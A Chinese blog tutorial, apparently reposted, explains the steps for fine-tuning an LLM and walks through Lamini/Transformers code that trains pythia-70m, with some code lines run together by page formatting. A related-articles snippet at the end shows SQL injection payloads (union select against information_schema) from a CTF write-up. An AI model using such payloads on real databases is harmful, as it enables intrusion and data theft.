【LLM教程-llama】如何Fine Tuning大語言模型?

今天給大家帶來了一篇超級詳細的教程,手把手教你如何對大語言模型進行微調(Fine Tuning)!(代碼和詳細解釋放在后文)

目錄

大語言模型進行微調(Fine Tuning)需要哪些步驟?

大語言模型進行微調(Fine Tuning)訓練過程及代碼


大語言模型進行微調(Fine Tuning)需要哪些步驟?

大語言模型進行微調(Fine Tuning)的主要步驟🤩

  1. 📚 準備訓練數據集
    首先你需要準備一個高質量的訓練數據集,最好是與你的應用場景相關的數據。可以是文本數據、對話數據等,格式一般為JSON/TXT等。

  2. 📦 選擇合適的基礎模型
    接下來需要選擇一個合適的基礎預訓練模型,作為微調的起點。常見的有GPT、BERT、T5等大模型,可根據任務場景進行選擇。

  3. ?? 設置訓練超參數
    然后是設置訓練的各種超參數,比如學習率、批量大小、訓練步數等等。選擇合理的超參數對模型效果影響很大哦。

  4. 🧑?💻 加載模型和數據集
    使用HuggingFace等庫,把選定的基礎模型和訓練數據集加載進來。記得對數據集進行必要的前處理和劃分。

  5. ? 開始模型微調訓練
    有了模型、數據集和超參數后,就可以開始模型微調訓練了!可以使用PyTorch/TensorFlow等框架進行訓練。

  6. 💾 保存微調后的模型
    訓練結束后,別忘了把微調好的模型保存下來,方便后續加載使用哦。

  7. 🧪 在測試集上評估模型
    最后在準備好的測試集上評估一下微調后模型的效果。看看與之前的基礎模型相比,是否有明顯提升?

大語言模型進行微調(Fine Tuning)訓練過程及代碼

那如何使用 Lamini 庫加載數據、設置模型和訓練超參數、定義推理函數、微調基礎模型、評估模型效果呢?

  • 首先,導入必要的庫
import os
import lamini
import datasets
import tempfile
import logging
import random
import config
import os
import yaml
import time
import torch
import transformers
import pandas as pd
import jsonlinesfrom utilities import *
from transformers import AutoTokenizer
from transformers import AutoModelForCausalLM
from transformers import TrainingArguments
from transformers import AutoModelForCausalLM
from llama import BasicModelRunner

這部分導入了一些必需的Python庫,包括Lamini、Hugging Face的Datasets、Transformers等。

  • 加載Lamini文檔數據集
dataset_name = "lamini_docs.jsonl"
dataset_path = f"/content/{dataset_name}"
use_hf = False
dataset_path = "lamini/lamini_docs"
use_hf = True

這里指定了數據集的路徑,同時設置了use_hf標志,表示是否使用Hugging Face的Datasets庫加載數據。

  • 設置模型、訓練配置和分詞器
model_name = "EleutherAI/pythia-70m"
training_config = { ... }
tokenizer = AutoTokenizer.from_pretrained(model_name)
tokenizer.pad_token = tokenizer.eos_token
train_dataset, test_dataset = tokenize_and_split_data(training_config, tokenizer)

這部分指定了基礎預訓練模型的名稱,并設置了訓練配置(如最大長度等)。然后,它使用AutoTokenizer從預訓練模型中加載分詞器,并對分詞器進行了一些調整。最后,它調用tokenize_and_split_data函數對數據進行分詞和劃分訓練/測試集。

  • 加載基礎模型
base_model = AutoModelForCausalLM.from_pretrained(model_name)
device_count = torch.cuda.device_count()
if device_count > 0:device = torch.device("cuda")
else:device = torch.device("cpu")
base_model.to(device)

這里使用AutoModelForCausalLM從預訓練模型中加載基礎模型,并根據設備(GPU或CPU)將模型移動到相應的設備上。

  • 定義推理函數
def inference(text, model, tokenizer, max_input_tokens=1000, max_output_tokens=100):...

這個函數用于在給定輸入文本的情況下,使用模型和分詞器進行推理并生成輸出。它包括對輸入文本進行分詞、使用模型生成輸出以及解碼輸出等步驟。

  • 嘗試使用基礎模型進行推理
test_text = test_dataset[0]['question']
print("Question input (test):", test_text)
print(f"Correct answer from Lamini docs: {test_dataset[0]['answer']}")
print("Model's answer: ")
print(inference(test_text, base_model, tokenizer))

這部分使用上一步定義的inference函數,在測試數據集的第一個示例上嘗試使用基礎模型進行推理。它打印了輸入問題、正確答案和模型的輸出。

  • 設置訓練參數
max_steps = 3
trained_model_name = f"lamini_docs_{max_steps}_steps"
output_dir = trained_model_name
training_args = TrainingArguments(# Learning ratelearning_rate=1.0e-5,# Number of training epochsnum_train_epochs=1,# Max steps to train for (each step is a batch of data)# Overrides num_train_epochs, if not -1max_steps=max_steps,# Batch size for trainingper_device_train_batch_size=1,# Directory to save model checkpointsoutput_dir=output_dir,# Other argumentsoverwrite_output_dir=False, # Overwrite the content of the output directorydisable_tqdm=False, # Disable progress barseval_steps=120, # Number of update steps between two evaluationssave_steps=120, # After # steps model is savedwarmup_steps=1, # Number of warmup steps for learning rate schedulerper_device_eval_batch_size=1, # Batch size for evaluationevaluation_strategy="steps",logging_strategy="steps",logging_steps=1,optim="adafactor",gradient_accumulation_steps = 4,gradient_checkpointing=False,# Parameters for early stoppingload_best_model_at_end=True,save_total_limit=1,metric_for_best_model="eval_loss",greater_is_better=False
)

這一部分設置了訓練的一些參數,包括最大訓練步數、輸出模型目錄、學習率等超參數。

為什么要這樣設置這些訓練超參數:

  1. learning_rate=1.0e-5
    學習率控制了模型在每個訓練步驟中從訓練數據中學習的速度。1e-5是一個相對較小的學習率,可以有助于穩定訓練過程,防止出現divergence(發散)的情況。

  2. num_train_epochs=1
    訓練的輪數,即讓數據在模型上循環多少次。這里設置為1,是因為我們只想進行輕微的微調,避免過度訓練(overfitting)。

  3. max_steps=max_steps
    最大訓練步數,會覆蓋num_train_epochs。這樣可以更好地控制訓練的總步數。

  4. per_device_train_batch_size=1
    每個設備(GPU/CPU)上的訓練批量大小。批量大小越大,內存占用越高,但訓練過程可能更加穩定。

  5. output_dir=output_dir
    用于保存訓練過程中的檢查點(checkpoints)和最終模型的目錄。

  6. overwrite_output_dir=False
    如果目錄已存在,是否覆蓋它。設為False可以避免意外覆蓋之前的結果。

  7. eval_steps=120, save_steps=120
    每120步評估一次模型性能,并保存模型。頻繁保存可以在訓練中斷時恢復。

  8. warmup_steps=1
    學習率warmup步數,一開始使用較小的學習率有助于穩定訓練早期階段。

  9. per_device_eval_batch_size=1
    評估時每個設備上的批量大小。通常與訓練時相同。

  10. evaluation_strategy="steps", logging_strategy="steps"
    以步數為間隔進行評估和記錄日志,而不是以epoch為間隔。

  11. optim="adafactor"
    使用Adafactor優化器,適用于大規模語言模型訓練。

  12. gradient_accumulation_steps=4
    梯度積累步數,可以模擬使用更大批量大小的效果,節省內存。

  13. load_best_model_at_end=True
    保存驗證集上性能最好的那個檢查點,作為最終模型。

  14. metric_for_best_model="eval_loss", greater_is_better=False
    根據驗證損失評估模型,損失越小越好。

model_flops = (base_model.floating_point_ops({"input_ids": torch.zeros((1, training_config["model"]["max_length"]))})* training_args.gradient_accumulation_steps
)print(base_model)
print("Memory footprint", base_model.get_memory_footprint() / 1e9, "GB")
print("Flops", model_flops / 1e9, "GFLOPs")print(base_model)
print("Memory footprint", base_model.get_memory_footprint() / 1e9, "GB")
print("Flops", model_flops / 1e9, "GFLOPs")

這里還計算并打印了模型的內存占用和計算復雜度(FLOPs)。

最后,使用這些參數創建了一個Trainer對象,用于實際進行模型訓練。

trainer = Trainer(model=base_model,model_flops=model_flops,total_steps=max_steps,args=training_args,train_dataset=train_dataset,eval_dataset=test_dataset,
)
  • 訓練模型幾個步驟
training_output = trainer.train()

這一行代碼啟動了模型的微調訓練過程,并將訓練輸出存儲在training_output中。

  • 保存微調后的模型
save_dir = f'{output_dir}/final'
trainer.save_model(save_dir)
print("Saved model to:", save_dir)
finetuned_slightly_model = AutoModelForCausalLM.from_pretrained(save_dir, local_files_only=True)
finetuned_slightly_model.to(device)

這部分將微調后的模型保存到指定的目錄中。

然后,它使用AutoModelForCausalLM.from_pretrained從保存的模型中重新加載該模型,并將其移動到相應的設備上。

  • 使用微調后的模型進行推理
test_question = test_dataset[0]['question']
print("Question input (test):", test_question)
print("Finetuned slightly model's answer: ")
print(inference(test_question, finetuned_slightly_model, tokenizer))
test_answer = test_dataset[0]['answer']
print("Target answer output (test):", test_answer)

這里使用之前定義的inference函數,在測試數據集的第一個示例上嘗試使用微調后的模型進行推理。

打印了輸入問題、模型輸出以及正確答案。

  • 加載并運行其他預訓練模型
finetuned_longer_model = AutoModelForCausalLM.from_pretrained("lamini/lamini_docs_finetuned")
tokenizer = AutoTokenizer.from_pretrained("lamini/lamini_docs_finetuned")
finetuned_longer_model.to(device)
print("Finetuned longer model's answer: ")
print(inference(test_question, finetuned_longer_model, tokenizer))bigger_finetuned_model = BasicModelRunner(model_name_to_id["bigger_model_name"])
bigger_finetuned_output = bigger_finetuned_model(test_question)
print("Bigger (2.8B) finetuned model (test): ", bigger_finetuned_output)

這部分加載了另一個經過更長時間微調的模型,以及一個更大的2.8B參數的微調模型。它使用這些模型在測試數據集的第一個示例上進行推理,并打印出結果。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/38847.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/38847.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/38847.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

VuePress介紹

從本文開始,動手搭建自己的博客!希望讀者能跟著一起動手,這樣才能真正掌握。 ? VuePress 是什么 VuePress 是由 Vue 作者帶領團隊開發的,非常火,使用的人很多;Vue 框架官網也是用了 VuePress 搭建的。即…

000.二分查找算法題解目錄

000.二分查找算法題解目錄 69. x 的平方根(簡單)

4PCS點云配準算法實現

4PCS點云配準算法的C實現如下&#xff1a; #include <iostream> #include <pcl/io/pcd_io.h> #include <pcl/point_types.h> #include <pcl/common/common.h> #include <pcl/common/distances.h> #include <pcl/common/transforms.h> #in…

唯一ID:UUID 介紹與 google/uuid 庫生成 UUID

UUID 即通用唯一識別碼&#xff0c;是一種用于計算機系統中以確保全局唯一性的標識符。其標準定義于 RFC 4122 文檔中。標準形式包含 32 個 16 進制數字&#xff0c;以連字符切割為五組&#xff0c;格式為 8-4-4-4-12&#xff0c;總共 36 個字符。&#xff08;形如, d169aa7f-4…

php 通過vendor文件 生成還原最新的composer.json

起因&#xff1a;因為歷史原因&#xff0c;在本項目中composer.json基本算廢了&#xff0c;沒法直接使用composer管理擴展&#xff0c;今天嘗試修復一下composer.json。 歷史文件&#xff0c;可以看出來已經很久沒有維護了&#xff0c;我們主要是恢復require的信息 {"na…

K8s節點維護流程

用途 用于下線異常節點、集群縮容等 操作步驟 1. 查看節點名稱 先確認節點的名稱 kubectl get node -o wide2. 設置節點不可調度 設置節點不可調度狀態&#xff0c;禁止新的pod調度到該節點上 kubectl cordon ${node_name}3. 剔除節點上運行的pod&#xff08;生產環境慎…

Spring Boot中集成Redis實現緩存功能

Spring Boot中集成Redis實現緩存功能 大家好&#xff0c;我是免費搭建查券返利機器人省錢賺傭金就用微賺淘客系統3.0的小編&#xff0c;也是冬天不穿秋褲&#xff0c;天冷也要風度的程序猿&#xff01;今天我們將深入探討如何在Spring Boot應用程序中集成Redis&#xff0c;實現…

AP無法上線原因分析及排障

一、AP未分配到IP地址 如果遇到AP無法上線問題&#xff0c;可以檢查下AP是否分配到IP地址。AP獲取IP地址有兩種方式&#xff1a;靜態方式&#xff1a;登錄到AP設備&#xff0c;手工配置IP地址&#xff0c;該方式操作起來比較麻煩&#xff0c;不推薦使用&#xff1b;DHCP方式&am…

基于CNN的股票預測方法【卷積神經網絡】

基于機器學習方法的股票預測系列文章目錄 一、基于強化學習DQN的股票預測【股票交易】 二、基于CNN的股票預測方法【卷積神經網絡】 文章目錄 基于機器學習方法的股票預測系列文章目錄一、CNN建模原理二、模型搭建三、模型參數的選擇&#xff08;1&#xff09;探究window_size…

下代iPhone或回歸可拆卸電池,蘋果這操作把我看傻了

剛度過一個愉快的周末&#xff0c;蘋果又雙叒叕攤上事兒了。 iPhone13 系列被曝扎堆電池鼓包了。 早在去年&#xff0c;就有 iPhone13 和 iPhone14 用戶反饋過類似的問題&#xff0c;表示在手機僅僅使用了一年多的時間就出現了電池鼓包的情況&#xff0c;而且還把屏幕給撐起來了…

舞會無領導:一種樹形動態規劃的視角

沒有上司的舞會 Ural 大學有 &#x1d441; 名職員&#xff0c;編號為1~&#x1d441;。 他們的關系就像一棵以校長為根的樹&#xff0c;父節點就是子節點的直接上司。 每個職員有一個快樂指數&#xff0c;用整數 &#x1d43b;&#x1d456; 給出&#xff0c;其中1≤&…

校園卡手機卡怎么注銷?

校園手機卡的注銷流程可以根據不同的運營商和具體情況有所不同&#xff0c;但一般來說&#xff0c;以下是注銷校園手機卡的幾種常見方式&#xff0c;我將以分點的方式詳細解釋&#xff1a; 一、線上注銷&#xff08;通過手機APP或官方網站&#xff09; 下載并打開對應運營商的…

C++ 指針介紹

指針是C編程語言中的一個強大且重要的特性。它允許程序員直接操作內存地址&#xff0c;從而提供了對低級別內存的訪問和控制。雖然指針在使用時可能比較復雜且容易出錯&#xff0c;但它們在提高程序效率和靈活性方面有著不可替代的作用。本文將介紹C指針的基本概念、用法及其應…

Docker 中 MySQL 遷移策略(單節點)

目錄 一、 簡介二、操作流程2.1 進入mysql容器2.2 導出 MySQL 數據2.3. 將導出的文件復制到宿主機2.4 創建 Docker Compose 配置2.5 啟動新的 Docker 容器2.6 導入數據到新的容器2.7 驗證數據2.8 刪除舊的容器&#xff08;刪除操作需慎重&#xff09; 三、推薦配置四、寫在后面…

當年很多跑到美加澳寫代碼的人現在又移回香港?什么原因?

當年很多跑到美加澳寫代碼的人現在又移回香港&#xff1f;什么原因&#xff1f; 近年來&#xff0c;確實有部分曾經移民到美國、加拿大、澳大利亞等地的香港居民選擇移回香港。這一現象與多種因素相關&#xff0c;主要可以歸結為以下幾點&#xff1a; 疫情后的環境變化&#…

【STM32】溫濕度采集與OLED顯示

一、任務要求 1. 學習I2C總線通信協議&#xff0c;使用STM32F103完成基于I2C協議的AHT20溫濕度傳感器的數據采集&#xff0c;并將采集的溫度-濕度值通過串口輸出。 任務要求&#xff1a; 1&#xff09;解釋什么是“軟件I2C”和“硬件I2C”&#xff1f;&#xff08;閱讀野火配…

2025第13屆常州國際工業裝備博覽會招商全面啟動

常州智造 裝備中國|2025第13屆常州國際工業裝備博覽會招商全面啟動 2025第13屆常州國際工業裝備博覽會將于2025年4月11-13日在常州西太湖國際博覽中心盛大舉行&#xff01;目前&#xff0c;各項籌備工作正穩步推進。 60000平米的超大規模、800多家國內外工業裝備制造名企將云集…

C++中的RAII(資源獲取即初始化)原則

C中的RAII&#xff08;Resource Acquisition Is Initialization&#xff0c;資源獲取即初始化&#xff09;原則是一種管理資源、避免資源泄漏的慣用法。RAII是C之父Bjarne Stroustrup提出的設計理念&#xff0c;其核心思想是將資源的獲取&#xff08;如動態內存分配、文件句柄、…

最細最有條理解析:事件循環(消息循環)是什么?進程與線程的定義、關系與差異

目錄 事件循環&#xff1a;引入 一、瀏覽器的進程模型 1.1、什么是進程&#xff08;Process&#xff09; 1.2、什么是線程&#xff08;Thread&#xff09; 1.3、進程與線程之間的關系聯系與區別 二、瀏覽器有哪些進程和線程 2.1、瀏覽器的主要進程 ①瀏覽器進程 ②網絡…

ctfshow sqli-libs web561--web568

web561 ?id-1 or 1--?id-1 union select 1,2,3--?id-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_nameflags),3-- Your Username is : id,flag4s?id-1 union select 1,(select group_concat(flag4s) from ctfshow.f…